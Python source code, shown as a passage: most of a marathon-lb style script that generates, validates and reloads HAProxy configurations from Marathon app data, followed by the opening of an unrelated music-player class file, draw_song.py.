http_frontend_route = \
templater.\
haproxy_http_frontend_routing_only_with_path_and_auth(app)
staging_http_frontends += http_frontend_route.format(
cleanedUpHostname=acl_name,
realm=app.authRealm,
backend=backend
)
else:
http_frontend_route = \
templater.haproxy_http_frontend_routing_only_with_path(app)
staging_http_frontends += http_frontend_route.format(
cleanedUpHostname=acl_name,
backend=backend
)
else:
if app.authRealm:
http_frontend_route = \
templater.\
haproxy_http_frontend_routing_only_with_auth(app)
staging_http_frontends += http_frontend_route.format(
cleanedUpHostname=acl_name,
realm=app.authRealm,
backend=backend
)
else:
if not haproxy_map:
http_frontend_route = \
templater.haproxy_http_frontend_routing_only(app)
staging_http_frontends += http_frontend_route.format(
cleanedUpHostname=acl_name,
backend=backend
)
else:
# A single hostname in the VHOST label
logger.debug(
"adding virtual host for app with hostname %s", app.hostname)
acl_name = re.sub(r'[^a-zA-Z0-9\-]', '_', app.hostname) + \
'_' + app.appId[1:].replace('/', '_')
if app.sslCert is not None:
https_grouped_frontend_list[app.hostname][1].add(app.sslCert)
if app.bindOptions is not None:
https_grouped_frontend_list[app.hostname][2].add(app.bindOptions)
if app.path:
if app.redirectHttpToHttps:
http_frontend_acl = \
templater.haproxy_http_frontend_acl_only(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname
)
http_frontend_acl = \
templater.haproxy_http_frontend_acl_only_with_path(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
path=app.path,
backend=backend
)
haproxy_backend_redirect_http_to_https = \
templater.\
haproxy_backend_redirect_http_to_https_with_path(app)
frontend = haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr,
cleanedUpHostname=acl_name,
backend=backend
)
staging_http_frontends += frontend
else:
if app.authRealm:
http_frontend_acl = \
templater.\
haproxy_http_frontend_acl_with_auth_and_path(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
path=app.path,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
else:
http_frontend_acl = \
templater.haproxy_http_frontend_acl_with_path(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
path=app.path,
appId=app.appId,
backend=backend
)
https_frontend_acl = \
templater.haproxy_https_frontend_acl_only_with_path(app)
staging_https_frontend = https_frontend_acl.format(
path=app.path,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
if app.authRealm:
https_frontend_acl = \
templater.\
haproxy_https_frontend_acl_with_auth_and_path(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
path=app.path,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
https_frontend_acl = \
templater.haproxy_https_frontend_acl_with_path(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
if app.redirectHttpToHttps:
http_frontend_acl = \
templater.haproxy_http_frontend_acl(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
backend=backend
)
haproxy_backend_redirect_http_to_https = \
templater.\
haproxy_backend_redirect_http_to_https(app)
frontend = haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr,
cleanedUpHostname=acl_name
)
staging_http_frontends += frontend
else:
if app.authRealm:
http_frontend_acl = \
templater.haproxy_http_frontend_acl_with_auth(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
else:
if haproxy_map:
if 'map_http_frontend_acl' not in duplicate_map:
app.backend_weight = -1
http_frontend_acl = \
templater.haproxy_map_http_frontend_acl(app)
staging_http_frontends += http_frontend_acl.format(
haproxy_dir=haproxy_dir
)
duplicate_map['map_http_frontend_acl'] = 1
map_element = {}
map_element[app.hostname] = backend
if map_element not in map_array:
map_array.append(map_element)
else:
http_frontend_acl = \
templater.haproxy_http_frontend_acl(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
backend=backend
)
if app.authRealm:
https_frontend_acl = \
templater.haproxy_https_frontend_acl_with_auth(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
if haproxy_map:
if 'map_https_frontend_acl' not in duplicate_map:
app.backend_weight = -1
https_frontend_acl = templater.\
haproxy_map_https_frontend_acl(app)
staging_https_frontend = https_frontend_acl.format(
hostname=app.hostname,
haproxy_dir=haproxy_dir
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
duplicate_map['map_https_frontend_acl'] = 1
map_element = {}
map_element[app.hostname] = backend
if map_element not in map_array:
map_array.append(map_element)
else:
https_frontend_acl = templater.\
haproxy_https_frontend_acl(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=app.hostname,
appId=app.appId,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[app.hostname][0].append(
(app.backend_weight, staging_https_frontend))
return (app.backend_weight,
staging_http_frontends,
staging_https_frontends,
https_grouped_frontend_list)
def writeConfigAndValidate(
config, config_file, domain_map_string, domain_map_file,
app_map_string, app_map_file, haproxy_map):
# Test run, print to stdout and exit
if args.dry:
print(config)
sys.exit()
temp_config = config
# First write the new maps to temporary files
if haproxy_map:
domain_temp_map_file = writeReplacementTempFile(domain_map_string,
domain_map_file)
app_temp_map_file = writeReplacementTempFile(app_map_string,
app_map_file)
# Change the file paths in the config to (temporarily) point to the
# temporary map files so those can also be checked when the config is
# validated
temp_config = config.replace(
domain_map_file, domain_temp_map_file
).replace(app_map_file, app_temp_map_file)
# Write the new config to a temporary file
haproxyTempConfigFile = writeReplacementTempFile(temp_config, config_file)
if validateConfig(haproxyTempConfigFile):
# Move into place
if haproxy_map:
moveTempFile(domain_temp_map_file, domain_map_file, "domain_map")
moveTempFile(app_temp_map_file, app_map_file, "app_map")
# Edit the config file again to point to the actual map paths
with open(haproxyTempConfigFile, 'w') as tempConfig:
tempConfig.write(config)
else:
truncateMapFileIfExists(domain_map_file)
truncateMapFileIfExists(app_map_file)
moveTempFile(haproxyTempConfigFile, config_file, "hap_cfg")
return True
else:
moveTempFile(haproxyTempConfigFile, 'haproxy_tmp_conf_fail',
'haproxy_temp_config_fail')
if haproxy_map:
removeTempFileIfExist(domain_temp_map_file)
removeTempFileIfExist(app_temp_map_file)
return False
def writeReplacementTempFile(content, file_to_replace):
# Create a temporary file containing the given content that will be used to
# replace the given file after validation. Returns the path to the
# temporary file.
fd, tempFile = mkstemp()
logger.debug(
"writing temp file %s that will replace %s", tempFile, file_to_replace)
with os.fdopen(fd, 'w') as tempConfig:
tempConfig.write(content)
# Ensure the new file is created with the same permissions the old file had
# or use defaults if the file doesn't exist yet
perms = 0o644
if os.path.isfile(file_to_replace):
perms = stat.S_IMODE(os.lstat(file_to_replace).st_mode)
os.chmod(tempFile, perms)
return tempFile
def validateConfig(haproxy_config_file):
# If skip validation flag is provided, don't check.
if args.skip_validation:
logger.debug("skipping validation.")
return True
# Check that config is valid
cmd = ['haproxy', '-f', haproxy_config_file, '-c']
logger.debug("checking config with command: " + str(cmd))
returncode = subprocess.call(args=cmd)
if returncode == 0:
return True
else:
logger.error("haproxy returned non-zero when checking config")
return False
def moveTempFile(temp_file, dest_file, tmp_filename):
# Replace the old file with the new from its temporary location
for suffix in range(args.archive_versions - 1, 0, -1):
tmp_src_file = "/tmp/" + tmp_filename + "." + str(suffix)
tmp_dest_file = "/tmp/" + tmp_filename + "." + str(suffix + 1)
if os.path.isfile(tmp_src_file):
logger.debug("Copying temp file %s to %s",
tmp_src_file, tmp_dest_file)
copy(tmp_src_file, tmp_dest_file)
logger.debug("Copying temp files %s to %s",
temp_file, "/tmp/" + tmp_filename + ".1")
copy(temp_file, "/tmp/" + tmp_filename + ".1")
logger.debug("moving temp file %s to %s", temp_file, dest_file)
move(temp_file, dest_file)
def truncateMapFileIfExists(map_file):
if os.path.isfile(map_file):
logger.debug("Truncating map file as haproxy-map flag "
"is disabled %s", map_file)
fd = os.open(map_file, os.O_RDWR)
os.ftruncate(fd, 0)
os.close(fd)
def removeTempFileIfExist(temp_file):
if os.path.isfile(temp_file):
logger.debug("delete tempfile %s", temp_file)
os.remove(temp_file)
def generateAndValidateTempConfig(config, config_file, domain_map_array,
app_map_array, haproxy_map):
temp_config_file = "%s.tmp" % config_file
domain_map_file = os.path.join(os.path.dirname(temp_config_file),
"domain2backend.map.tmp")
app_map_file = os.path.join(os.path.dirname(temp_config_file),
"app2backend.map.tmp")
domain_map_string = str()
app_map_string = str()
if haproxy_map:
domain_map_string = generateMapString(domain_map_array)
app_map_string = generateMapString(app_map_array)
return writeConfigAndValidate(
config, temp_config_file, domain_map_string, domain_map_file,
app_map_string, app_map_file, haproxy_map)
def compareWriteAndReloadConfig(config, config_file, domain_map_array,
app_map_array, haproxy_map):
changed = False
config_valid = False
# See if the last config on disk matches this, and if so don't reload
# haproxy
domain_map_file = os.path.join(os.path.dirname(config_file),
"domain2backend.map")
app_map_file = os.path.join(os.path.dirname(config_file),
"app2backend.map")
domain_map_string = str()
app_map_string = str()
runningConfig = str()
try:
logger.debug("reading running config from %s", config_file)
with open(config_file, "r") as f:
runningConfig = f.read()
except IOError:
logger.warning("couldn't open config file for reading")
if haproxy_map:
domain_map_string = generateMapString(domain_map_array)
app_map_string = generateMapString(app_map_array)
if (runningConfig != config or
compareMapFile(domain_map_file, domain_map_string) or
compareMapFile(app_map_file, app_map_string)):
logger.info(
"running config/map is different from generated"
" config - reloading")
if writeConfigAndValidate(
config, config_file, domain_map_string, domain_map_file,
app_map_string, app_map_file, haproxy_map):
reloadConfig()
changed = True
config_valid = True
else:
logger.warning("skipping reload: config/map not valid")
changed = True
config_valid = False
else:
logger.debug("skipping reload: config/map unchanged")
changed = False
config_valid = True
else:
truncateMapFileIfExists(domain_map_file)
truncateMapFileIfExists(app_map_file)
if runningConfig != config:
logger.info(
"running config is different from generated config"
" - reloading")
if writeConfigAndValidate(
config, config_file, domain_map_string, domain_map_file,
app_map_string, app_map_file, haproxy_map):
reloadConfig()
changed = True
config_valid = True
else:
logger.warning("skipping reload: config not valid")
changed = True
config_valid = False
else:
changed = False
config_valid = True
logger.debug("skipping reload: config unchanged")
return changed, config_valid
def generateMapString(map_array):
# Generate the string representation of the map file from a map array
map_string = str()
for element in map_array:
for key, value in list(element.items()):
map_string = map_string + str(key) + " " + str(value) + "\n"
return map_string
def compareMapFile(map_file, map_string):
# Read the map file (creating an empty file if it does not exist) and
# compare its contents to the given map string. Returns true if the map
# string is different to the contents of the file.
if not os.path.isfile(map_file):
open(map_file, 'a').close()
runningmap = str()
try:
logger.debug("reading map config from %s", map_file)
with open(map_file, "r") as f:
runningmap = f.read()
except IOError:
logger.warning("couldn't open map file for reading")
return runningmap != map_string
def get_health_check(app, portIndex):
if 'healthChecks' not in app:
return None
for check in app['healthChecks']:
if check.get('port'):
return check
if check.get('portIndex') == portIndex:
return check
return None
healthCheckResultCache = LRUCache()
def get_apps(marathon, apps=[]):
if len(apps) == 0:
apps = marathon.list()
logger.debug("got apps %s", [app["id"] for app in apps])
excluded_states = {'TASK_KILLING', 'TASK_KILLED',
'TASK_FINISHED', 'TASK_ERROR'}
marathon_apps = []
# This process requires 2 passes: the first is to gather apps belonging
# to a deployment group.
processed_apps = []
deployment_groups = {}
for app in apps:
deployment_group = None
if 'HAPROXY_DEPLOYMENT_GROUP' in app['labels']:
deployment_group = app['labels']['HAPROXY_DEPLOYMENT_GROUP']
# mutate the app id to match deployment group
if deployment_group[0] != '/':
deployment_group = '/' + deployment_group
app['id'] = deployment_group
else:
processed_apps.append(app)
continue
if deployment_group in deployment_groups:
# merge the groups, with the oldest taking precedence
prev = deployment_groups[deployment_group]
cur = app
# If for some reason neither label is set correctly, then it's a
# crapshoot. Most likely, whichever one is unset was not deployed
# with ZDD, so we should prefer the one with a date set.
cur_date = datetime.datetime.min
prev_date = datetime.datetime.min
if 'HAPROXY_DEPLOYMENT_STARTED_AT' in prev['labels']:
prev_date = dateutil.parser.parse(
prev['labels']['HAPROXY_DEPLOYMENT_STARTED_AT'])
if 'HAPROXY_DEPLOYMENT_STARTED_AT' in cur['labels']:
cur_date = dateutil.parser.parse(
cur['labels']['HAPROXY_DEPLOYMENT_STARTED_AT'])
old = new = None
if prev_date < cur_date:
old = prev
new = cur
else:
new = prev
old = cur
if 'HAPROXY_DEPLOYMENT_NEW_INSTANCES' in new['labels']:
if int(new['labels']['HAPROXY_DEPLOYMENT_NEW_INSTANCES'] != 0):
new_scale_time = dateutil.parser.parse(
new['versionInfo']['lastScalingAt'])
old_scale_time = dateutil.parser.parse(
old['versionInfo']['lastScalingAt'])
if old_scale_time > new_scale_time:
temp = old
old = new
new = temp
target_instances = \
int(new['labels']['HAPROXY_DEPLOYMENT_TARGET_INSTANCES'])
else:
target_instances = 1
# Mark N tasks from old app as draining, where N is the
# number of instances in the new app. Sort the old tasks so that
# order is deterministic (i.e. so that we always drain the same
# tasks).
old_tasks = sorted(old['tasks'], key=lambda task: task['id'])
healthy_new_instances = 0
if len(app['healthChecks']) > 0:
for task in new['tasks']:
if 'healthCheckResults' not in task:
continue
alive = True
for result in task['healthCheckResults']:
if not result['alive']:
alive = False
if alive:
healthy_new_instances += 1
else:
healthy_new_instances = new['instances']
maximum_drainable = \
max(0, (healthy_new_instances + old['instances']) -
target_instances)
for i in range(0, min(len(old_tasks),
healthy_new_instances,
maximum_drainable)):
old_tasks[i]['draining'] = True
# merge tasks from new app into old app
merged = old
old_tasks.extend(new['tasks'])
merged['tasks'] = old_tasks
deployment_groups[deployment_group] = merged
else:
deployment_groups[deployment_group] = app
processed_apps.extend(deployment_groups.values())
# Reset the service port assigner. This forces the port assigner to
# re-assign ports for IP-per-task applications. The upshot is that
# the service port for a particular app may change dynamically, but
# the service port will be deterministic and identical across all
# instances of the marathon-lb.
SERVICE_PORT_ASSIGNER.reset()
for app in processed_apps:
appId = app['id']
if appId[1:] == os.environ.get("FRAMEWORK_NAME"):
continue
marathon_app = MarathonApp(marathon, appId, app)
if 'HAPROXY_GROUP' in marathon_app.app['labels']:
marathon_app.groups = \
marathon_app.app['labels']['HAPROXY_GROUP'].split(',')
marathon_apps.append(marathon_app)
service_ports = SERVICE_PORT_ASSIGNER.get_service_ports(app)
for i, servicePort in enumerate(service_ports):
if servicePort is None:
logger.warning("Skipping undefined service port")
continue
service = MarathonService(appId, servicePort,
get_health_check(app, i),
marathon.strict_mode())
for key_unformatted in label_keys:
key = key_unformatted.format(i)
if key in marathon_app.app['labels']:
func = label_keys[key_unformatted]
func(service,
key_unformatted,
marathon_app.app['labels'][key])
# https://github.com/mesosphere/marathon-lb/issues/198
# Marathon app manifest which defines healthChecks is
# defined for a specific given service port identified
# by either a port or portIndex.
# (Marathon itself will prefer port before portIndex
# https://mesosphere.github.io/marathon/docs/health-checks.html)
#
# We want to be able to instruct HAProxy
# to use health check defined for service port B
# in marathon to indicate service port A is healthy
# or not for service port A in HAProxy.
#
# This is done by specifying a label:
# HAPROXY_{n}_BACKEND_HEALTHCHECK_PORT_INDEX
#
# TODO(norangshol) Refactor and supply MarathonService
# TODO(norangshol) with its labels and do this in its constructor?
if service.healthCheck is None \
and service.healthcheck_port_index is not None:
service.healthCheck = \
get_health_check(app, service.healthcheck_port_index)
if service.healthCheck:
healthProto = service.healthCheck['protocol']
if healthProto in ['HTTP', 'HTTPS', 'MESOS_HTTP',
'MESOS_HTTPS']:
service.mode = 'http'
marathon_app.services[servicePort] = service
for task in app['tasks']:
# Marathon 0.7.6 bug workaround
if not task['host']:
logger.warning("Ignoring Marathon task without host " +
task['id'])
continue
# 'state' will not be present in test cases.
# Should always be present in an actual cluster
if 'state' in task and task['state'] in excluded_states:
logger.warning("Ignoring non-running task " + task['id'] +
" with state " + task['state'])
continue
if marathon.health_check() and 'healthChecks' in app and \
len(app['healthChecks']) > 0:
alive = True
if 'healthCheckResults' not in task:
# use previously cached result, if it exists
if not healthCheckResultCache.get(task['id'], False):
continue
else:
for result in task['healthCheckResults']:
if not result['alive']:
alive = False
healthCheckResultCache.set(task['id'], alive)
if not alive:
continue
task_ip, task_ports = get_task_ip_and_ports(app, task)
if task_ip is None:
logger.warning("Task has no resolvable IP address - skip")
continue
draining = task.get('draining', False)
# if different versions of app have different number of ports,
# try to match as many ports as possible
for task_port, service_port in zip(task_ports, service_ports):
service = marathon_app.services.get(service_port, None)
if service:
service.groups = marathon_app.groups
service.add_backend(task['host'],
task_ip,
task_port,
draining)
# Convert into a list for easier consumption
apps_list = []
for marathon_app in marathon_apps:
for service in list(marathon_app.services.values()):
if service.backends:
apps_list.append(service)
return apps_list
def regenerate_config(marathon, config_file, groups, bind_http_https,
ssl_certs, templater, haproxy_map, group_https_by_vhost):
domain_map_array = []
app_map_array = []
raw_apps = marathon.list()
apps = get_apps(marathon, raw_apps)
generated_config = config(apps, groups, bind_http_https, ssl_certs,
templater, haproxy_map, domain_map_array,
app_map_array, config_file, group_https_by_vhost)
(changed, config_valid) = compareWriteAndReloadConfig(
generated_config, config_file, domain_map_array, app_map_array,
haproxy_map)
if changed and not config_valid and not args.skip_config_cleanup:
apps = make_config_valid_and_regenerate(marathon,
raw_apps,
groups,
bind_http_https,
ssl_certs,
templater,
haproxy_map,
domain_map_array,
app_map_array,
config_file,
group_https_by_vhost)
return apps
# Build up a valid configuration by adding one app at a time and checking
# for valid config file after each app
def make_config_valid_and_regenerate(marathon,
raw_apps,
groups,
bind_http_https,
ssl_certs,
templater,
haproxy_map,
domain_map_array,
app_map_array,
config_file,
group_https_by_vhost):
try:
start_time = time.time()
apps = []
valid_apps = []
excluded_ids = []
included_ids = []
for app in raw_apps:
domain_map_array = []
app_map_array = []
valid_apps.append(app)
apps = get_apps(marathon, valid_apps)
generated_config = config(apps, groups, bind_http_https,
ssl_certs, templater, haproxy_map,
domain_map_array, app_map_array,
config_file, group_https_by_vhost)
config_valid = generateAndValidateTempConfig(generated_config,
config_file,
domain_map_array,
app_map_array,
haproxy_map)
if not config_valid:
logger.warn(
"invalid configuration caused by app %s; "
"it will be excluded", app["id"])
del valid_apps[-1]
excluded_ids.append(app["id"])
else:
included_ids.append(app["id"])
if len(valid_apps) > 0:
logger.debug("reloading valid config including apps: %s, and "
"excluding apps: %s", included_ids, excluded_ids)
domain_map_array = []
app_map_array = []
apps = get_apps(marathon, valid_apps)
valid_config = config(apps, groups, bind_http_https,
ssl_certs, templater, haproxy_map,
domain_map_array, app_map_array,
config_file, group_https_by_vhost)
compareWriteAndReloadConfig(valid_config,
config_file,
domain_map_array,
app_map_array, haproxy_map)
else:
logger.error("A valid config file could not be generated after "
"excluding all apps! skipping reload")
logger.debug("reloading while excluding invalid tasks finished, "
"took %s seconds",
time.time() - start_time)
return apps
except Exception:
logger.exception("Unexpected error!")
class MarathonEventProcessor(object):
def __init__(self, marathon,
config_file,
groups,
bind_http_https,
ssl_certs,
haproxy_map,
group_https_by_vhost):
self.__marathon = marathon
# appId -> MarathonApp
self.__apps = dict()
self.__config_file = config_file
self.__groups = groups
self.__templater = ConfigTemplater()
self.__bind_http_https = bind_http_https
self.__group_https_by_vhost = group_https_by_vhost
self.__ssl_certs = ssl_certs
self.__condition = threading.Condition()
self.__pending_reset = False
self.__pending_reload = False
self.__haproxy_map = haproxy_map
self.relevant_events = ('api_post_event',
'health_status_changed_event',
'status_update_event')
self.__thread = None
# Fetch the base data
self.reset_from_tasks()
def start(self):
self.__stop = False
if self.__thread is not None and self.__thread.is_alive():
self.reset_from_tasks()
return
self.__thread = threading.Thread(target=self.try_reset)
self.__thread.start()
def try_reset(self):
with self.__condition:
logger.info('({}): starting event processor thread'.format(
threading.get_ident()))
while True:
self.__condition.acquire()
if self.__stop:
logger.info('({}): stopping event processor thread'.format(
threading.get_ident()))
self.__condition.release()
return
if not self.__pending_reset and not self.__pending_reload:
if not self.__condition.wait(300):
logger.info('({}): condition wait expired'.format(
threading.get_ident()))
pending_reset = self.__pending_reset
pending_reload = self.__pending_reload
self.__pending_reset = False
self.__pending_reload = False
self.__condition.release()
# Reset takes precedence over reload
if pending_reset:
self.do_reset()
elif pending_reload:
self.do_reload()
else:
# Timed out waiting on the condition variable, just do a
# full reset for good measure (as was done before).
self.do_reset()
def do_reset(self):
try:
start_time = time.time()
self.__apps = regenerate_config(self.__marathon,
self.__config_file,
self.__groups,
self.__bind_http_https,
self.__ssl_certs,
self.__templater,
self.__haproxy_map,
self.__group_https_by_vhost)
logger.debug("({0}): updating tasks finished, "
"took {1} seconds".format(
threading.get_ident(),
time.time() - start_time))
except requests.exceptions.ConnectionError as e:
logger.error(
"({0}): Connection error({1}): {2}. Marathon is {3}".format(
threading.get_ident(), e.errno, e.strerror,
self.__marathon.current_host))
except Exception:
logger.exception("Unexpected error!. Marathon is {0}".format(
self.__marathon.current_host))
def do_reload(self):
try:
# Validate the existing config before reloading
logger.debug("({}): attempting to reload existing "
"config...".format(
threading.get_ident()))
if validateConfig(self.__config_file):
reloadConfig()
except Exception:
logger.exception("Unexpected error!")
def stop(self):
self.__condition.acquire()
self.__stop = True
self.__condition.notify()
self.__condition.release()
def reset_from_tasks(self):
self.__condition.acquire()
self.__pending_reset = True
self.__condition.notify()
self.__condition.release()
def reload_existing_config(self):
self.__condition.acquire()
self.__pending_reload = True
self.__condition.notify()
self.__condition.release()
def handle_event(self, event):
if event['eventType'] in self.relevant_events:
self.reset_from_tasks()
def handle_signal(self, sig, stack):
if sig == signal.SIGHUP:
logger.debug('received signal SIGHUP - reloading config')
self.reset_from_tasks()
elif sig == signal.SIGUSR1:
logger.debug('received signal SIGUSR1 - reloading existing config')
self.reload_existing_config()
else:
logger.warning('received unknown signal %d' % (sig,))
def get_arg_parser():
parser = argparse.ArgumentParser(
description="Marathon HAProxy Load Balancer",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--longhelp",
help="Print out configuration details",
action="store_true")
parser.add_argument("--marathon", "-m",
nargs="+",
help="[required] Marathon endpoint, eg. " +
"-m http://marathon1:8080 http://marathon2:8080",
default=["http://master.mesos:8080"])
parser.add_argument("--haproxy-config",
help="Location of haproxy configuration",
default="/etc/haproxy/haproxy.cfg")
parser.add_argument("--group",
help="[required] Only generate config for apps which"
" list the specified names. Use '*' to match all"
" groups, including those without a group specified.",
action="append",
default=list())
parser.add_argument("--command", "-c",
help="If set, run this command to reload haproxy.",
default=None)
parser.add_argument("--max-reload-retries",
help="Max reload retries before failure. Reloads"
" happen every --reload-interval seconds. Set to"
" 0 to disable or -1 for infinite retries.",
type=int, default=10)
parser.add_argument("--reload-interval",
help="Wait this number of seconds between"
" reload retries.",
type=int, default=10)
parser.add_argument("--strict-mode",
help="If set, backends are only advertised if"
" HAPROXY_{n}_ENABLED=true. Strict mode will be"
" enabled by default in a future release.",
action="store_true")
parser.add_argument("--sse", "-s",
help="Use Server Sent Events",
action="store_true")
parser.add_argument("--archive-versions",
help="Number of config versions to archive",
type=int, default=5)
parser.add_argument("--health-check", "-H",
help="If set, respect Marathon's health check "
"statuses before adding the app instance into "
"the backend pool.",
action="store_true")
parser.add_argument("--lru-cache-capacity",
help="LRU cache size (in number "
"of items). This should be at least as large as the "
"number of tasks exposed via marathon-lb.",
type=int, default=1000
)
parser.add_argument("--haproxy-map",
help="Use HAProxy maps for domain name to backend"
"mapping.", action="store_true")
parser.add_argument("--dont-bind-http-https",
help="Don't bind to HTTP and HTTPS frontends.",
action="store_true")
parser.add_argument("--group-https-by-vhost",
help="Group https frontends by vhost.",
action="store_true")
parser.add_argument("--ssl-certs",
help="List of SSL certificates separated by comma"
"for frontend marathon_https_in"
"Ex: /etc/ssl/site1.co.pem,/etc/ssl/site2.co.pem",
default="/etc/ssl/cert.pem")
parser.add_argument("--skip-validation",
help="Skip haproxy config file validation",
action="store_true")
parser.add_argument("--skip-config-cleanup",
help="If one app fails, don't try to make "
"configuration valid by removing apps one by one",
action="store_true")
parser.add_argument("--dry", "-d",
help="Only print configuration to console",
action="store_true")
parser.add_argument("--min-serv-port-ip-per-task",
help="Minimum port number to use when auto-assigning "
"service ports for IP-per-task applications",
type=int, default=10050)
parser.add_argument("--max-serv-port-ip-per-task",
help="Maximum port number to use when auto-assigning "
"service ports for IP-per-task applications",
type=int, default=10100)
parser.add_argument("--max-backoff",
help="Maximum backoff to limit backoff size ",
type=int, default=300)
parser = set_logging_args(parser)
parser = set_marathon_auth_args(parser)
return parser
def load_json(data_str):
return cleanup_json(json.loads(data_str))
if __name__ == '__main__':
# Process arguments
arg_parser = get_arg_parser()
args = arg_parser.parse_args()
# Print the long help text if flag is set
if args.longhelp:
print(__doc__)
print('```')
arg_parser.print_help()
print('```')
print(ConfigTemplater().get_descriptions())
sys.exit()
# otherwise make sure that a Marathon URL was specified
else:
if args.marathon is None:
arg_parser.error('argument --marathon/-m is required')
if bool(args.min_serv_port_ip_per_task) != \
bool(args.max_serv_port_ip_per_task):
arg_parser.error(
'either specify both --min-serv-port-ip-per-task '
'and --max-serv-port-ip-per-task or neither (set both to zero '
'to disable auto assignment)')
if args.min_serv_port_ip_per_task > args.max_serv_port_ip_per_task:
arg_parser.error(
'cannot set --min-serv-port-ip-per-task to a higher value '
'than --max-serv-port-ip-per-task')
if len(args.group) == 0:
arg_parser.error('argument --group is required: please' +
'specify at least one group name')
# Configure the service port assigner if min/max ports have been specified.
if args.min_serv_port_ip_per_task and args.max_serv_port_ip_per_task:
SERVICE_PORT_ASSIGNER.set_ports(args.min_serv_port_ip_per_task,
args.max_serv_port_ip_per_task)
# Set request retries
s = requests.Session()
a = requests.adapters.HTTPAdapter(max_retries=3)
s.mount('http://', a)
# Setup logging
setup_logging(logger, args.syslog_socket, args.log_format, args.log_level)
# initialize health check LRU cache
if args.health_check:
healthCheckResultCache = LRUCache(args.lru_cache_capacity)
ip_cache.set(LRUCache(args.lru_cache_capacity))
# Marathon API connector
marathon = Marathon(args.marathon,
args.health_check,
args.strict_mode,
get_marathon_auth_params(args),
args.marathon_ca_cert)
# If we're going to be handling events, set up the event processor and
# hook it up to the process signals.
if args.sse:
processor = MarathonEventProcessor(marathon,
args.haproxy_config,
args.group,
not args.dont_bind_http_https,
args.ssl_certs,
args.haproxy_map,
args.group_https_by_vhost)
signal.signal(signal.SIGHUP, processor.handle_signal)
signal.signal(signal.SIGUSR1, processor.handle_signal)
backoffFactor = 1.5
waitSeconds = 3
waitResetSeconds = 600
while True:
stream_started = time.time()
currentWaitSeconds = random.random() * waitSeconds
stream = marathon.get_event_stream(processor.relevant_events)
try:
# processor start is now idempotent and will start at
# most one thread
processor.start()
events = marathon.iter_events(stream)
for event in events:
if (event.data.strip() != ''):
# marathon sometimes sends more than one json per event
# e.g. {}\r\n{}\r\n\r\n
for real_event_data in re.split(r'\r\n', event.data):
data = load_json(real_event_data)
logger.info(
"received event of type {0}"
.format(data['eventType']))
processor.handle_event(data)
else:
logger.info("skipping empty message")
except pycurl.error as e:
errno, e_msg = e.args
# Error number 28:
# 'Operation too slow. Less than 1 bytes/sec transferred
# the last 300 seconds'
# This happens when there is no activity on the marathon
# event stream for the last 5 minutes. In this case we
# should immediately reconnect in case the connection to
# marathon died silently so that we miss as few events as
# possible.
if errno == 28:
m = 'Possible timeout detected: {}, reconnecting now...'
logger.info(m.format(e_msg))
currentWaitSeconds = 0
else:
logger.exception("Caught exception")
logger.error("Reconnecting in {}s...".format(
currentWaitSeconds))
except Exception:
logger.exception("Caught exception")
logger.error("Reconnecting in {}s...".format(
currentWaitSeconds))
# We must close the connection because we are calling
# get_event_stream on the next loop
stream.curl.close()
if currentWaitSeconds > 0:
# Increase the next waitSeconds by the backoff factor
waitSeconds = backoffFactor * waitSeconds
# Don't sleep any more than 5 minutes
if waitSeconds > args.max_backoff:
waitSeconds = args.max_backoff
# Reset the backoff if it's been more than 10 minutes
if (time.time() - stream_started) > waitResetSeconds:
waitSeconds = 3
time.sleep(currentWaitSeconds)
processor.stop()
else:
# Generate base config
regenerate_config(marathon,
args.haproxy_config,
args.group,
not args.dont_bind_http_https,
args.ssl_certs,
ConfigTemplater(),
args.haproxy_map,
args.group_https_by_vhost)
|
draw_song.py
|
# -*- coding: utf-8 -*-
from Scripts.elements import *
from Scripts.song_manage import SongManage
from Scripts.music_storage import MusicStorage
class DrawSong(SongManage):
def __init__(self, canvas, y, song_num, info, lib):
self.canvas = canvas
self.y = y
self.lib = lib
self.song_num = song_num
self.song_data = info
self.song_bbox = None
self.song_coords = {}
# def __del__(self):
# pass
def del_class(self):
del self.y
del self.canvas
del self.song_num
del self.song_data
del self.song_bbox
def play_click(self):
if self.click_play:
self.click_play = 0
Main.PLAYER_SETTINGS["play"] = 0
self.play_button["image"] = MyImage.PLAY
Main.PLAYER.pause()
# update buttons #
Main.SONG_LINE.draw_music_line()
Main.MENU.update_buttons()
else:
self.click_play = 1
Main.PLAYER_SETTINGS["play"] = 1
self.play_button["image"] = MyImage.PAUSE
